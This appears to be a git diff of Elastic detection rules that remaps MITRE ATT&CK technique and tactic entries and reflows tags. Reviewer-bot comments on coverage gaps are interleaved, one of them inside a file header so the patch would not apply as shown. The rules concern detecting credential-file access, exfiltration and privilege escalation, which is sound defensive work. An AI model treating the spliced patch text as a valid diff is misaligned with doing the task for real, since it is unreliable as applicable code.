-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
[[rule.threat.technique]]
id = "T1548"
name = "Abuse Elevation Control Mechanism"
@@ -160,11 +147,3 @@ reference = "https://attack.mitre.org/techniques/T1548/001/"
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml
index 6073256d5ec..69a21b3669b 100644
--- a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml
+++ b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2025/10/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -81,16 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -125,11 +116,6 @@ not process.parent.executable in (
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
[[rule.threat.technique]]
id = "T1548"
name = "Abuse Elevation Control Mechanism"
@@ -144,24 +130,3 @@ reference = "https://attack.mitre.org/techniques/T1548/001/"
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml
index c214967001f..37598c101d8 100644
--- a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml
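Review bot: Dropping the T1218 System Binary Proxy Execution entry and the TA0005 tactic leaves `privilege_escalation_potential_suid_sgid_proxy_execution.toml` mapped only to T1548.001, although proxy execution is the behaviour the file is named for. The removed entry was written in an unconventional shape (the `[rule.threat.tactic]` table before the `[[rule.threat.technique]]` entry, tactic fields in name/id order), which may be why it was cut rather than normalised; if only normalisation was intended, re-adding it as a regular `[[rule.threat]]` block with `id = "T1218"` under `TA0005` keeps the Defense Evasion coverage that the `@@ -81,16` hunk's `Tactic: Defense Evasion` tag removal also drops. If the removal is deliberate, a sentence in the PR description saying so would help future readers of this rule's history.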
+++ b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml
@@ -2,7 +2,7 @@
creation_date = "2023/07/28"
integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -81,17 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
- "Data Source: Crowdstrike",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
type = "eql"
query = '''
sequence by host.id with maxspan=1s
@@ -113,24 +103,16 @@ sequence by host.id with maxspan=1s
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
[[rule.threat.technique]]
id = "T1059"
name = "Command and Scripting Interpreter"
reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
[rule.threat.tactic]
id = "TA0002"
name = "Execution"
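Review bot: After this hunk `privilege_escalation_potential_wildcard_shell_spawn.toml` maps only to TA0002 Execution and its tags no longer carry `Tactic: Privilege Escalation`, so the file-name prefix no longer matches any tactic the rule declares; the same applies to the sda disk mount rule (now Defense Evasion only) and the shadow file read rule (now Credential Access only) in the following hunks. The rule is presumably identified by its `rule_id` rather than its path, so this is not a functional problem, but if the repository's naming convention ties the prefix to the primary tactic, a follow-up rename, or a line in the PR description stating that prefixes are intentionally left unchanged, would avoid confusion.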
diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml
index d916e1256e9..11888270c0a 100644
--- a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml
+++ b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml
@@ -2,7 +2,7 @@
creation_date = "2023/08/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -49,14 +49,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
@@ -104,16 +97,11 @@ DebugFS is a Linux utility that provides a low-level interface to access and man
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1078.003"
-name = "Local Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/003/"
+id = "T1006"
+name = "Direct Volume Access"
+reference = "https://attack.mitre.org/techniques/T1006/"
[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml
index e4e20b3b750..720aed99079 100644
--- a/rules/linux/privilege_escalation_shadow_file_read.toml
+++ b/rules/linux/privilege_escalation_shadow_file_read.toml
@@ -2,7 +2,7 @@
creation_date = "2022/09/01"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Credential Access",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "new_terms"
query = '''
@@ -112,18 +103,6 @@ host.os.type : "linux" and event.category : "process" and event.action : ("exec"
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
[[rule.threat.technique]]
id = "T1003"
name = "OS Credential Dumping"
@@ -138,7 +117,6 @@ reference = "https://attack.mitre.org/techniques/T1003/008/"
id = "TA0006"
name = "Credential Access"
reference = "https://attack.mitre.org/tactics/TA0006/"
-
[rule.new_terms]
field = "new_terms_fields"
value = ["process.executable"]
diff --git a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml
index c90a6990fbb..832ec099d33 100644
--- a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml
+++ b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml
@@ -2,7 +2,7 @@
creation_date = "2023/08/30"
integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -114,9 +114,14 @@ process where host.os.type == "linux" and event.type == "start" and
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.003"
+name = "Sudo and Sudo Caching"
+reference = "https://attack.mitre.org/techniques/T1548/003/"
[rule.threat.tactic]
id = "TA0004"
diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml
index b137cf4d019..edb6791dcf1 100644
--- a/rules/linux/privilege_escalation_sudo_hijacking.toml
+++ b/rules/linux/privilege_escalation_sudo_hijacking.toml
@@ -2,7 +2,7 @@
creation_date = "2023/07/26"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
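Review bot: In `privilege_escalation_sudo_cve_2019_14287.toml` the T1068 Exploitation for Privilege Escalation technique is replaced rather than supplemented: the rule is named for exploitation of a specific sudo CVE, which is exactly what T1068 describes, whereas T1548.003 Sudo and Sudo Caching covers abuse of sudo configuration and cached credentials. Keeping both under the existing `TA0004` tactic (a second `[[rule.threat.technique]]` block with `id = "T1068"`, `name = "Exploitation for Privilege Escalation"` and its reference) would preserve the exploitation mapping that downstream consumers filtering on T1068 may rely on. The `[rule.threat.tactic]` block continues outside the hunk.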
@@ -123,6 +123,19 @@ file.path in ("/usr/bin/sudo", "/bin/sudo") and not (
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1548"
name = "Abuse Elevation Control Mechanism"
@@ -137,16 +150,3 @@ reference = "https://attack.mitre.org/techniques/T1548/003/"
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml
index a679ec48580..18f20937a5d 100644
--- a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml
+++ b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2023/09/05"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -103,11 +103,6 @@ sequence by host.id, process.entity_id with maxspan=1s
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
[[rule.threat.technique]]
id = "T1548"
name = "Abuse Elevation Control Mechanism"
diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml
index 0035cfea05d..b1539ceef80 100644
--- a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml
+++ b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml
@@ -2,7 +2,7 @@
creation_date = "2024/01/08"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -46,15 +46,7 @@ However, if more advanced configuration is required to detect specific behavior,
-- "-w /root/ -p rwxa -k audit_root"
"""
severity = "medium"
-tags = [
- "Data Source: Auditd Manager",
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
type = "eql"
query = '''
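Review bot: The rewritten `tags` line in `privilege_escalation_suspicious_chown_fowner_elevation.toml` puts the two `Tactic:` entries ahead of `Domain:`/`OS:`/`Use Case:`, whereas the other rewritten tags lines in this patch lead with Domain, OS and Use Case and keep the Tactic entries after them; the passwd file write hunk later in the patch has the same ordering. Suggested line: `tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Resources: Investigation Guide"]`. If a formatter emitted these lines, the ordering is probably better fixed there than by hand.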
@@ -109,14 +101,31 @@ In Linux, CAP_CHOWN and CAP_FOWNER are capabilities that allow processes to chan
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
+id = "T1222"
+name = "File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/"
+[[rule.threat.technique.subtechnique]]
+id = "T1222.002"
+name = "Linux and Mac File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/002/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
[rule.threat.tactic]
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml
index 923962a5d96..80df457f7e6 100644
--- a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml
+++ b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml
@@ -2,7 +2,7 @@
creation_date = "2024/01/22"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -68,15 +68,7 @@ However, if more advanced configuration is required to detect specific behavior,
-- "-w /etc/passwd -p wa -k etcpasswd"
"""
severity = "medium"
-tags = [
- "Data Source: Auditd Manager",
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
type = "eql"
query = '''
@@ -124,14 +116,31 @@ In Linux environments, the `/etc/passwd` file is crucial for managing user accou
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
+id = "T1136"
+name = "Create Account"
+reference = "https://attack.mitre.org/techniques/T1136/"
+[[rule.threat.technique.subtechnique]]
+id = "T1136.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1136/001/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
[rule.threat.tactic]
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml
index a179911f656..0ecf1365784 100644
--- a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml
+++ b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml
@@ -2,7 +2,7 @@
creation_date = "2024/01/08"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -122,11 +122,6 @@ sequence by host.id, process.entity_id with maxspan=1s
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
[[rule.threat.technique]]
id = "T1548"
name = "Abuse Elevation Control Mechanism"
diff --git a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml
index 46af7128890..2634a5f0b87 100644
--- a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml
+++ b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml
@@ -2,7 +2,7 @@
creation_date = "2023/10/26"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -81,15 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "new_terms"
query = '''
@@ -116,33 +108,19 @@ and process.parent.name:("bash" or "dash" or "sh" or "tcsh" or "csh" or "zsh" or
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
[[rule.threat.technique.subtechnique]]
-id = "T1574.013"
-name = "KernelCallbackTable"
-reference = "https://attack.mitre.org/techniques/T1574/013/"
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
[rule.threat.tactic]
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1014"
-name = "Rootkit"
-reference = "https://attack.mitre.org/techniques/T1014/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
[rule.new_terms]
field = "new_terms_fields"
value = ["process.executable"]
diff --git a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml
index 05c5c6f2abf..83b68d9963f 100644
--- a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml
+++ b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml
@@ -2,7 +2,7 @@
creation_date = "2022/08/30"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -121,9 +121,9 @@ process.executable: "/usr/bin/unshare" and not (
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
[rule.threat.tactic]
id = "TA0004"
diff --git a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml
index 298a32c90fc..d33678e809c 100644
--- a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml
+++ b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml
@@ -2,7 +2,7 @@
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -75,30 +75,40 @@ sequence by process.entity_id with maxspan=15s
[[rule.threat]]
framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Collection"
- id = "TA0009"
- reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat.technique]]
+id = "T1074"
+name = "Data Staged"
+reference = "https://attack.mitre.org/techniques/T1074/"
- [[rule.threat.technique]]
- name = "Data Staged"
- id = "T1074"
- reference = "https://attack.mitre.org/techniques/T1074/"
+[[rule.threat.technique.subtechnique]]
+id = "T1074.001"
+name = "Local Data Staging"
+reference = "https://attack.mitre.org/techniques/T1074/001/"
- [[rule.threat.technique.subtechnique]]
- name = "Local Data Staging"
- id = "T1074.001"
- reference = "https://attack.mitre.org/techniques/T1074/001/"
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
[[rule.threat]]
framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Discovery"
- id = "TA0007"
- reference = "https://attack.mitre.org/tactics/TA0007/"
-
- [[rule.threat.technique]]
- name = "System Information Discovery"
- id = "T1082"
- reference = "https://attack.mitre.org/techniques/T1082/"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
+
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml
index 68fa16c9024..ed184cef7fe 100644
--- a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml
+++ b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml
@@ -2,7 +2,7 @@
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/01/30"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -80,30 +80,22 @@ sequence by process.entity_id with maxspan=30s
[[rule.threat]]
framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Collection"
- id = "TA0009"
- reference = "https://attack.mitre.org/tactics/TA0009/"
-
- [[rule.threat.technique]]
- name = "Data Staged"
- id = "T1074"
- reference = "https://attack.mitre.org/techniques/T1074/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Local Data Staging"
- id = "T1074.001"
- reference = "https://attack.mitre.org/techniques/T1074/001/"
-
- [[rule.threat.technique]]
- name = "Archive Collected Data"
- id = "T1560"
- reference = "https://attack.mitre.org/techniques/T1560/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
- [rule.threat.tactic]
- name = "Exfiltration"
- id = "TA0010"
- reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat.technique]]
+id = "T1074"
+name = "Data Staged"
+reference = "https://attack.mitre.org/techniques/T1074/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1074.001"
+name = "Local Data Staging"
+reference = "https://attack.mitre.org/techniques/T1074/001/"
+
+[[rule.threat.technique]]
+id = "T1560"
+name = "Archive Collected Data"
+reference = "https://attack.mitre.org/techniques/T1560/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/macos/command_and_control_aws_s3_connection_via_script.toml b/rules/macos/command_and_control_aws_s3_connection_via_script.toml
index 2128dd0828a..d1e76b8309b 100644
--- a/rules/macos/command_and_control_aws_s3_connection_via_script.toml
+++ b/rules/macos/command_and_control_aws_s3_connection_via_script.toml
@@ -2,7 +2,7 @@
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -50,14 +50,7 @@ This rule flags macOS script interpreters (AppleScript, Node.js, Python) that re
risk_score = 47
rule_id = "05f2b649-dc03-4e9a-8c4e-6762469e8249"
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: macOS",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
type = "esql"
query = '''
FROM logs-endpoint.events.network-*
@@ -78,30 +71,30 @@ FROM logs-endpoint.events.network-*
[[rule.threat]]
framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Command and Control"
- id = "TA0011"
- reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1102"
+name = "Web Service"
+reference = "https://attack.mitre.org/techniques/T1102/"
- [[rule.threat.technique]]
- name = "Web Service"
- id = "T1102"
- reference = "https://attack.mitre.org/techniques/T1102/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
[[rule.threat]]
framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Exfiltration"
- id = "TA0010"
- reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat.technique]]
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
- [[rule.threat.technique]]
- name = "Exfiltration Over Web Service"
- id = "T1567"
- reference = "https://attack.mitre.org/techniques/T1567/"
+[[rule.threat.technique.subtechnique]]
+id = "T1567.002"
+name = "Exfiltration to Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1567/002/"
- [[rule.threat.technique.subtechnique]]
- name = "Exfiltration to Cloud Storage"
- id = "T1567.002"
- reference = "https://attack.mitre.org/techniques/T1567/002/"
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/macos/command_and_control_executable_download_via_wget.toml b/rules/macos/command_and_control_executable_download_via_wget.toml
index 6cc39502d2a..2e29febee49 100644
--- a/rules/macos/command_and_control_executable_download_via_wget.toml
+++ b/rules/macos/command_and_control_executable_download_via_wget.toml
@@ -2,7 +2,7 @@
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -73,30 +73,12 @@ sequence by process.entity_id with maxspan=30s
[[rule.threat]]
framework = "MITRE ATT&CK"
